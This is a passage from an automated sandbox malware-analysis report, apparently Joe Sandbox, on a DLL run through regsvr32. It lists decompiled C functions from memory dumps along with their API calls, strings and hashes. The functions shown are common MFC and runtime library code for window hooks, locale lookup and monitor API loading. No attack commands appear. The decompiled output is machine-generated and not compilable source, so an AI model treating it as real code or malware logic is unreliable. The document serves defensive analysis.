0x10023e0a
0x10023e0c
0x00000000
0x00000000
0x10023dad
0x10023db0
0x10023db3
0x10023db6
0x10023db7
0x10023db7
0x10023db8
0x10023db8
0x10023dba
0x00000000
0x00000000
0x10023de1
0x10023de4
0x10023de5
0x10023de5
0x10023de8
0x10023de8
0x10023de9
0x10023d03
0x10023d03
0x00000000
0x00000000
0x10023df2
0x10023df5
0x10023df8
0x10023dfb
0x10023dfc
0x10023dfc
0x10023dfd
0x10023e00
0x10023e00
0x10023e02
0x00000000
0x00000000
0x10023e17
0x10023e1d
0x10023e1e
0x10023e1f
0x10023e22
0x10023e22
0x10023e25
0x10023e26
0x10023e2a
0x10023e2b
0x10023e2d
0x10023e2f
0x10023e32
0x10023e32
0x10023e34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10023e3b
0x10023e3d
0x10023e3f
0x10023e41
0x10023e44
0x00000000
0x00000000
0x10023b5e
0x10023b5e
0x10023b5e
0x00000000
0x00000000
0x10023b0b
0x10023b54
0x10023b54
0x10023b59
0x00000000
0x10023b59
0x10023a98
0x00000000
0x00000000
0x10023a9a
0x10023a9f
0x10023aa2
0x10023aa9
0x00000000
0x00000000
0x10023ab6
0x00000000
0x00000000
0x00000000
0x10023ab8
0x10023a17
0x00000000
0x00000000
0x10023a1f
0x10023a29
0x10023a2f
0x10023a39
0x10023a3f
0x00000000
0x00000000
0x10023a47
0x00000000
0x00000000
0x10023a49
0x10023a57
0x10023a5f
0x00000000
0x00000000
0x00000000
0x10023a5f
0x10023a37
0x00000000
0x00000000
0x00000000
0x10023a37
0x10023a27
0x00000000
0x00000000
0x00000000
0x100239f4
0x100239ff
0x10023a06
0x10023e0e
0x10023e0e
0x10023e66
0x10023e66
0x10023e6b
0x10023e70
0x10023e70
0x10023e74
0x10023b60
0x10023b66
0x10023b6e
0x10023b6e
0x00000000
0x10023a06
0x100239f2
0x100239b4
0x100239ba
0x00000000
0x00000000
0x100239c5
0x100239c6
0x100239c7
0x100239cc
0x00000000
0x100239cc
0x10023994
0x10023999
0x100239a4
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10023978

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
Instruction ID: 1e1e474db0047197a83ae3098e3256374823658fb0d5be61515164714213afbe
Opcode Fuzzy Hash: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
Instruction Fuzzy Hash: 52E19C74600209EFDF25CF58EC81AAE7BA9EF04750FA1C515F819EB292C735EA10DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A444 Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001A444(void* __ebx, int _a4) {
				intOrPtr _v8;
				char _v10;
				char _v16;
				void* __ebp;
				intOrPtr _t7;
				signed int _t9;
				signed int _t11;
				void* _t14;
				void* _t17;

				_t7 =  *0x1004c470; // 0xf256d946
				_v8 = _t7;
				_v10 = 0;
				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t9 != 0) {
					_t11 = E10012749(__ebx, _t14, _t17,  &_v16);
				} else {
					_t11 = _t9 | 0xffffffff;
				}
				return E100117AE(_t11, _v8);
			}

0x1001a44a
0x1001a451
0x1001a460
0x1001a464
0x1001a46c
0x1001a477
0x1001a46e
0x1001a46e
0x1001a46e
0x1001a486

APIs

GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 1001A464

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
Instruction ID: 3c73900817429885cf4f72f3856ece86c9a81f663f4ecb35863165dbab89a4dc
Opcode Fuzzy Hash: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
Instruction Fuzzy Hash: 66E09235A04248ABDB00DBF4D946E8D77F8AB45314F004155E550DB1D0DBB1E6848754

Uniqueness

Uniqueness Score: -1.00%

Function 10010A0C Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E10010A0C(signed int* __eax, void* __ebx, void* __ecx, signed int __edx, char _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int* _t81;
				signed int* _t83;
				void* _t85;
				signed int _t87;
				void* _t90;
				void* _t96;
				void* _t97;
				void* _t100;
				void* _t107;

				_t43 = _t85;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t90 = _t96;
				_t97 = _t96 - 8;
				_push(_t65);
				_push(_t85);
				_push(_t90);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t90);
					E1001095E(_t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t87 =  *(_t66 + 0xc);
					_t81 =  *(_t66 + 8);
					_t49 = E10014691(_t66);
					_t100 = _t97 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t87 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t81 + 4 + (_t87 + _t87 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t81 =  *(_t66 + 8);
								_t87 = _t81[_t87 + _t87 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t90 = _t90;
								_t87 = _t87;
								_t66 = _a8;
								_t55 = _t54;
								_t107 = _t54;
								if(_t107 == 0) {
									goto L8;
								} else {
									if(_t107 < 0) {
										_t46 = 0;
									} else {
										_t83 =  *(_t66 + 8);
										E1001091C(_t55, _t66);
										_t90 = _t66 + 0x10;
										E1001095E(_t66, 0);
										_t100 = _t100 + 0xc;
										E100109F2(_t83[2]);
										 *(_t66 + 0xc) =  *_t83;
										_t66 = 0;
										_t87 = 0;
										 *(_t83[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x10010a10
0x10010a11
0x10010a12
0x10010a15
0x10010a17
0x10010a1a
0x10010a1b
0x10010a1d
0x10010a1e
0x10010a1f
0x10010a22
0x10010a2c
0x10010add
0x10010ae4
0x10010aed
0x10010a32
0x10010a32
0x10010a38
0x10010a3e
0x10010a41
0x10010a44
0x10010a48
0x10010a4d
0x10010a52
0x10010ad2
0x00000000
0x10010a54
0x10010a54
0x10010a60
0x10010a62
0x10010abd
0x10010abd
0x10010ac3
0x00000000
0x10010a64
0x10010a73
0x10010a75
0x10010a76
0x10010a77
0x10010a7a
0x10010a7a
0x10010a7c
0x00000000
0x10010a7e
0x10010a7e
0x10010ac8
0x10010a80
0x10010a80
0x10010a84
0x10010a8c
0x10010a91
0x10010a96
0x10010aa2
0x10010aaa
0x10010ab1
0x10010ab7
0x10010abb
0x00000000
0x10010abb
0x10010a7e
0x10010a7c
0x00000000
0x10010a62
0x10010ad6
0x10010ad6
0x10010ad6
0x10010a52
0x10010af2
0x10010af9

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd70b53a73d0ea0346cfba45eab310f25b93afc8d14f05cebe56aea3a4839369
Instruction ID: 60c2bdf02f5a36eff57ac1f40e2e7856a3961677e697d4167067005d4253b2cc
Opcode Fuzzy Hash: fd70b53a73d0ea0346cfba45eab310f25b93afc8d14f05cebe56aea3a4839369
Instruction Fuzzy Hash: 6E21D632A003059FD700DF68C8809ABBBA5FF48350B4681A8EC959F246EB70FA55C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 10034959 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				void* _t47;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t95;
				signed int _t99;
				int _t100;
				int _t101;
				void* _t105;
				void* _t109;

				_t42 =  *0x1004c470; // 0xf256d946
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
							_t105 = 1;
							_t99 = 0;
							if(1 <= _t85) {
								L16:
								_t47 = 0;
								L17:
								return E100117AE(_t47, _v8);
							} else {
								goto L14;
							}
							while(1) {
								L14:
								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
								_pop(_t88);
								if(_t47 != _t85) {
									goto L17;
								}
								_t99 =  &(1[_t99]);
								if(_t99 < _t105) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_t88 =  &_v28;
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t88 = _t50 & 0x000003ff;
						_t100 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
						_v60 = ConvertDefaultLocale(_t100);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t88 = _t66 & 0x000003ff;
							_t101 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
							_t70 = ConvertDefaultLocale(_t101);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t95 = _t72 & 0x3ff;
				_v32 = _t95;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t88 = _t79 & 0x000003ff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}

0x1003495f
0x1003496d
0x10034974
0x10034977
0x1003497c
0x10034984
0x10034987
0x1003498f
0x10034a03
0x10034ab0
0x10034ab4
0x10034afe
0x10034afe
0x10034b06
0x10034b07
0x10034b0b
0x10034b24
0x10034b24
0x10034b26
0x10034b32
0x00000000
0x00000000
0x00000000
0x10034b0d
0x10034b0d
0x10034b14
0x10034b1c
0x10034b1d
0x00000000
0x00000000
0x10034b1f
0x10034b22
0x00000000
0x00000000
0x00000000
0x10034b22
0x00000000
0x10034b0d
0x10034ab6
0x10034ac4
0x10034ac7
0x10034ad1
0x00000000
0x00000000
0x10034ad3
0x10034adf
0x10034ae5
0x10034af3
0x10034af8
0x10034afb
0x10034afd
0x10034afd
0x00000000
0x10034afd
0x10034a1d
0x10034a28
0x10034a3f
0x10034a4e
0x10034a70
0x10034a79
0x10034a7c
0x10034a81
0x10034a87
0x10034a95
0x10034a98
0x10034a9a
0x10034a9c
0x10034a9f
0x10034a9f
0x10034aa3
0x10034aa3
0x00000000
0x10034a28
0x10034991
0x100349a3
0x100349a6
0x100349ad
0x100349b5
0x100349bd
0x100349ca
0x100349d3
0x100349d5
0x100349d8
0x100349dd
0x100349df
0x100349ea
0x100349ef
0x100349f2
0x100349f4
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
GetVersion.KERNEL32 ref: 100349FB
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
ConvertDefaultLocale.KERNEL32(761B4DE0), ref: 10034A98
RegCloseKey.ADVAPI32(?), ref: 10034AA3

Strings

GetUserDefaultUILanguage, xrefs: 1003497E
Control Panel\Desktop\ResourceLocale, xrefs: 10034A13
ntdll.dll, xrefs: 10034AAB
GetSystemDefaultUILanguage, xrefs: 100349C2
kernel32.dll, xrefs: 1003496F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 780041395-483790700
Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 100235CF Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x1004c470; // 0xf256d946
				_push(0x100347fd);
				_v8 = _t52;
				_t90 = E10037855(0x1004efe8);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_push(__edi);
					_t99 =  *_a12;
					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1004f354 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x1004ef68 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E10011C50( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x1004ef68 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E1002212F(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
							if(_t81 != E1002292C) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E100117AE(_t60, _v8);
				}
			}

0x100235d8
0x100235de
0x100235e8
0x100235f4
0x100235f6
0x10023613
0x10023616
0x10023617
0x10023620
0x10023624
0x10023627
0x10023642
0x10023692
0x10023694
0x100236db
0x10023718
0x1002372a
0x10023761
0x10023766
0x1002376e
0x10023771
0x10023779
0x10023786
0x1002378f
0x1002379e
0x100237a1
0x100237b1
0x100237b1
0x1002379e
0x10023786
0x00000000
0x10023771
0x00000000
0x1002372c
0x100236df
0x100236ea
0x100236f8
0x10023707
0x10023710
0x10023716
0x10023748
0x00000000
0x00000000
0x10023752
0x1002375f
0x00000000
0x00000000
0x00000000
0x1002375f
0x00000000
0x10023716
0x1002369b
0x100236a4
0x100236bc
0x100236be
0x100236c6
0x100236c8
0x100236c8
0x100236ca
0x00000000
0x100236ca
0x10023654
0x00000000
0x00000000
0x1002365a
0x10023662
0x10023670
0x10023675
0x1002367b
0x1002367b
0x1002368c
0x00000000
0x00000000
0x00000000
0x100237b7
0x100237b7
0x100237cc
0x100237ce
0x100237d3
0x100237d9
0x100237d9
0x100237de
0x00000000
0x100237e0
0x100235f8
0x10023604
0x100237e1
0x100237eb
0x100237eb

APIs

Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A

CallNextHookEx.USER32 ref: 10023604
GetClassLongA.USER32 ref: 10023649
GlobalGetAtomNameA.KERNEL32 ref: 10023675
lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
SetWindowLongA.USER32(?,000000FC,Function_0002292C), ref: 100236BE
CallNextHookEx.USER32 ref: 100237C2
UnhookWindowsHookEx.USER32(?), ref: 100237D3

Strings

AfxOldWndProc423, xrefs: 10023779, 1002377E, 1002378B, 10023795, 100237A0
ime, xrefs: 1002367E
#32768, xrefs: 100236FF, 10023704, 10023750

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
String ID: #32768$AfxOldWndProc423$ime
API String ID: 3204395069-4034971020
Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000799F Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000799F() {
				void* __edi;
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1004ee14; // 0x0
				if(_t23 == 0) {
					_push(_t17);
					 *0x1004ee18 = E10007952(_t17);
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x1004edf8 = 0;
						 *0x1004edfc = 0;
						 *0x1004ee00 = 0;
						 *0x1004ee04 = 0;
						 *0x1004ee08 = 0;
						 *0x1004ee0c = 0;
						 *0x1004ee10 = 0;
						 *0x1004ee14 = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x1004edf8 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x1004edfc = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x1004ee00 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x1004ee04 = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x1004ee0c = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x1004ee08 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x1004ee10 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x1004ee14 = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x1004ee08; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x100079a2
0x100079a8
0x100079b8
0x100079c3
0x100079ce
0x100079d2
0x10007a5f
0x10007a5f
0x10007a65
0x10007a6b
0x10007a71
0x10007a77
0x10007a7d
0x10007a83
0x10007a89
0x10007a93
0x100079d8
0x100079e4
0x100079e8
0x100079ed
0x00000000
0x100079ef
0x100079f5
0x100079f9
0x100079fe
0x00000000
0x10007a00
0x10007a06
0x10007a0a
0x10007a0f
0x00000000
0x10007a11
0x10007a17
0x10007a1b
0x10007a20
0x00000000
0x10007a22
0x10007a28
0x10007a2c
0x10007a31
0x00000000
0x10007a33
0x10007a39
0x10007a3d
0x10007a42
0x00000000
0x10007a44
0x10007a4a
0x10007a4e
0x10007a53
0x00000000
0x10007a55
0x10007a57
0x10007a58
0x10007a58
0x10007a53
0x10007a42
0x10007a31
0x10007a20
0x10007a0f
0x100079fe
0x100079ed
0x10007a98
0x100079aa
0x100079ac
0x100079b6
0x100079b6

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A

Strings

MonitorFromRect, xrefs: 10007A00
GetSystemMetrics, xrefs: 100079DE
EnumDisplayDevicesA, xrefs: 10007A44
GetMonitorInfoA, xrefs: 10007A33
USER32, xrefs: 100079BE
EnumDisplayMonitors, xrefs: 10007A22
MonitorFromWindow, xrefs: 100079EF
MonitorFromPoint, xrefs: 10007A11

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A

Uniqueness

Uniqueness Score: -1.00%

